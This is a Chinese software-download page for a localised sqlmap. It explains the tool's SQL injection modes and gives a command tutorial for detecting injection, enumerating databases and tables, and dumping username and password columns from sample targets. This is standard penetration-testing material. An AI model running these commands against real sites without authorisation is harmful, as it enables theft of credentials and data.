- 安卓下载 相关标签
类型:数据库类
语言:简体中文
更新: 2020-05-26 16:40:13
大小:6.9 GB
平台:Win All
- 1[数据库类]Oracle数据库下载 中文免费版
- 2[数据库类]mysql数据库下载 v5.7.25 免费版
- 3[数据库类]Microsoft SQL Server 2005最新版 简体中文版
- 4[数据库类]Database Browser Portable(数据库查看器)v5.3.1.6 英文绿色便携版
- 5[数据库类]啄木鸟数据库内容替换工具 v1.4.0 中文绿色免费版
- 6[数据库类]数据库损坏修复脚本 v1.0 绿色版
- 7[数据库类]phpMyAdmin 官方多语版
- 8[数据库类]数据库自动备份工具(支持多数据库同时备份)v1.1 中文绿色免费版
- 9[数据库类]桌面数据库 官方版
- 10[数据库类]巨人数据库压缩工具(减小数据库大小并加快访问速度)v1.0 简体中文绿色免费版
sqlmap是一款专业的sql注入工具,普遍适用于渗透测试,可以帮助用户发现数据库中存在的漏洞与风险,从而制定针对性解决方案。本次为大家带来的是sqlmap完整汉化版,内置简体中文支持,理解和使用都会更加的容易,不再以受到英语水平困扰,特被适合风险评估的朋友使用。
sqlmap拥有非常强大的检测引擎,能够自动检测和利用SQL注入漏洞,并且支持MySQL、Oracle、PostgreSQL等众多常见数据库,功能十分强大。

sqlmap特色介绍:
1、这是一款开源的渗透测试工具;
2、能够自动检测和利用SQL注入漏洞以及接入该数据库的服务器;
3、具有多种特性的渗透测试器;
4、支持五种不同的注入模式。
sqlmap注入模式介绍:
UNION query SQL injection(可联合查询注入)
Error-based SQL injection(报错型注入)
Boolean-based blind SQL injection(布尔型注入)
Time-based blind SQL injection(基于时间延迟注入)
Stacked queries SQL injection(可多语句查询注入)
英文看不懂的朋友可以对照下方的中文注释。
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。
2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
4、联合查询注入,可以使用union的情况下的注入。
5、堆查询注入,可以同时执行多条语句的执行时的注入。
sqlmap安装教程:
1、下载完成后解压;

2、使用cmd命令运行sqlmap;

3、记住要使用python2运行。
sqlmap使用教程:
【检测注入】
sqlmap -u “http://www.vuln.cn/post.php?id=1”
默认使用level1检测全部数据库类型
sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3
指定数据库类型为mysql,级别为3(共5级,级别越高,检测越全面)
【cookie注入】
当程序有防get注入的时候,可以使用cookie注入
sqlmap -u “http://www.xxx.com/shownews.asp” –cookie “id=11” –level 2(只有level达到2才会检测cookie)
【从post数据包中注入】
可以使用burpsuite或者temperdata等工具来抓取post包
sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql 指定username参数
【获取数据库基本信息】
sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 –dbs
查询有哪些数据库
sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test –tables
查询test数据库中有哪些表
sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test -T admin –columns
查询test数据库中admin表有哪些字段
sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test -T admin -C “username,password” –dump
dump出字段username与password中的数据
sqlmap注入教程:
1.对url进行检测,判断是否存在SQL注入
python sqlmap.py -u "url" --batch
跑完以后发现存在注入,,参数是username 注入类型为盲注,数据库是mysql,后端语言是jsp
2.获取数据库
python sqlmap.py -u URL --dbs --batch 获取全部数据库
python sqlmap.py -u URL --current-db --batch 获取当前数据库
获取到了当前的数据库为 wavsepDB
3.获取当前数据库里所有表
python sqlmap.py -u URL -D wavsepDB --tables --batch
4.获取表的字段
python sqlmap.py -u URL -D wavsepDB -T users --columns --batch
如图获取到上面字段以后,我们就开始dump字段内容了。
5.dump字段内容
python sqlmap.py -u URL -D wavsepDB -T users -C "password,username" --dump --batch
如果字段内容多的话可以再加上如 --start 1 --stop 100 这样就取1-100条数据
--dump 可以换成 --dump-all则导出全部的内容
sqlmap常用命令:
sqlmap -u [“url”] --dbs #获取数据库
sqlmap -u [“url”] --current-user #获取当前用户名称 :
sqlmap -u [“url”] --current-db #获取当前数据库名称
sqlmap -u [“url”] -D [‘数据库名’] --tables #列出表名 :
sqlmap -u [“url”] -D [‘数据库名’] -T[‘表名’] --columns #列出字段
sqlmap -u [“url”] -D [‘数据库名’] -T [‘表名’] -C [‘字段名1,字段名2,…’] --dump #获取字段内容
sqlmap下载安装 v0.9 完整汉化版其他版本
用户评论
最新评论
- 置顶 河北承德电信 网友 敷衍好东西值得分享 
- 置顶 山东菏泽联通 网友 星星少女?凡事要乘早 
- 置顶 甘肃定西电信 网友 东风寄千愁谢谢小编大大分享,支持一下。。。 
- 置顶 河南开封电信 网友 等过春秋这软件好用,奥力给 
- 置顶 云南保山联通 网友 一米阳光°几度温暖成功下载&成功使用 

 
                     access数据库查看器中文版下载 v2.0 绿色版
access数据库查看器中文版下载 v2.0 绿色版 Orca最新版下载 v4.5.6 官方版
Orca最新版下载 v4.5.6 官方版 microsoft sql server 2000官方下载 免费版
microsoft sql server 2000官方下载 免费版 microsoft visual foxpro免费下载 v6.0 官方版
microsoft visual foxpro免费下载 v6.0 官方版 sql server 2008 r2官方下载 含序列号 中文版
sql server 2008 r2官方下载 含序列号 中文版 firebird数据库下载 v3.0.3 绿色版
firebird数据库下载 v3.0.3 绿色版 sql2000数据库下载 32/64 完整版
sql2000数据库下载 32/64 完整版 visual foxpro中文版下载 v9.0 电脑版
visual foxpro中文版下载 v9.0 电脑版 sql server2012数据库中文版下载 免费版
sql server2012数据库中文版下载 免费版 PostgreSQL中文版 v14.0.1 客户端
PostgreSQL中文版 v14.0.1 客户端 WinSCP客户端 v5.19.5 免费版
WinSCP客户端 v5.19.5 免费版 Sql Server官方版下载 v2012 电脑版
Sql Server官方版下载 v2012 电脑版 MySQL官方中文版下载 v8.0.11 最新版本
MySQL官方中文版下载 v8.0.11 最新版本 SqliteStudio最新版下载 v3.3.0 汉化版
SqliteStudio最新版下载 v3.3.0 汉化版 xampp中文绿色版下载 v8.0.2 免费版
xampp中文绿色版下载 v8.0.2 免费版 Microsoft SQL Server2020最新安装包下载 百度网盘分享 中文免费版
Microsoft SQL Server2020最新安装包下载 百度网盘分享 中文免费版 sqlite编辑器最新版下载 v4.0.2 中文汉化版
sqlite编辑器最新版下载 v4.0.2 中文汉化版 Full Convert官方最新版下载 v21.4.1644.0 免费试用版
Full Convert官方最新版下载 v21.4.1644.0 免费试用版 XAMPP官方中文版下载 v8.0.2 最新版
XAMPP官方中文版下载 v8.0.2 最新版 BeetlSQL数据库访问工具官方下载 v2.9.6 最新版
BeetlSQL数据库访问工具官方下载 v2.9.6 最新版 ScyllaDB数据库管理软件 v4.2.2 官方版
ScyllaDB数据库管理软件 v4.2.2 官方版 msde管理工具免登录下载 v1.0.4 最新版
msde管理工具免登录下载 v1.0.4 最新版 OrientDB(图形化数据库管理软件) v3.1.5 官方版
OrientDB(图形化数据库管理软件) v3.1.5 官方版 sqlite database browser查看器下载 v5.3 免费版
sqlite database browser查看器下载 v5.3 免费版 sqldbx最新版下载 v6.00 中文专业版
sqldbx最新版下载 v6.00 中文专业版 Mongood(MongoDB管理工具)免费下载 v0.6.2 官方版
Mongood(MongoDB管理工具)免费下载 v0.6.2 官方版 pgweb(PostgreSQL)管理系统 v0.11.7 免费版
pgweb(PostgreSQL)管理系统 v0.11.7 免费版 DB2ToMsSql数据库转移工具 v2.8 官方版
DB2ToMsSql数据库转移工具 v2.8 官方版 XmlToPostgres(PostgreSQL导入XML数据工具) v2.1 官方版
XmlToPostgres(PostgreSQL导入XML数据工具) v2.1 官方版 RdfToOracle数据转换软件最新下载 v1.5 官方版
RdfToOracle数据转换软件最新下载 v1.5 官方版 jailer官方版下载 v9.1.1 中文汉化版
jailer官方版下载 v9.1.1 中文汉化版 Oracle数据库管理工具免费下载 v15.0 中文版
Oracle数据库管理工具免费下载 v15.0 中文版 MyLobEditor数据库编辑软件下载 v3.0 中文版
MyLobEditor数据库编辑软件下载 v3.0 中文版 oracle 10g数据库客户端32位/64位下载 官方版
oracle 10g数据库客户端32位/64位下载 官方版
 
                                
                             
                                
                             mongodb绿色版下载 v4.0.3 中文免费版
mongodb绿色版下载 v4.0.3 中文免费版 visual foxpro 9.0官方下载 中文版
visual foxpro 9.0官方下载 中文版 power builder官方下载 v9.0 汉化版
power builder官方下载 v9.0 汉化版 microsoft office access免费版下载 2020 电脑版
microsoft office access免费版下载 2020 电脑版 Apache HTTP Server下载 v2.4.41 官方版
Apache HTTP Server下载 v2.4.41 官方版 Postgresql数据库下载 v10.4 中文版
Postgresql数据库下载 v10.4 中文版 DB Commander官方下载 V2000 中文版
DB Commander官方下载 V2000 中文版 mysql workbench汉化下载 v8.0.19 中文版
mysql workbench汉化下载 v8.0.19 中文版 DBC2000官方下载 v5.65 汉化版
DBC2000官方下载 v5.65 汉化版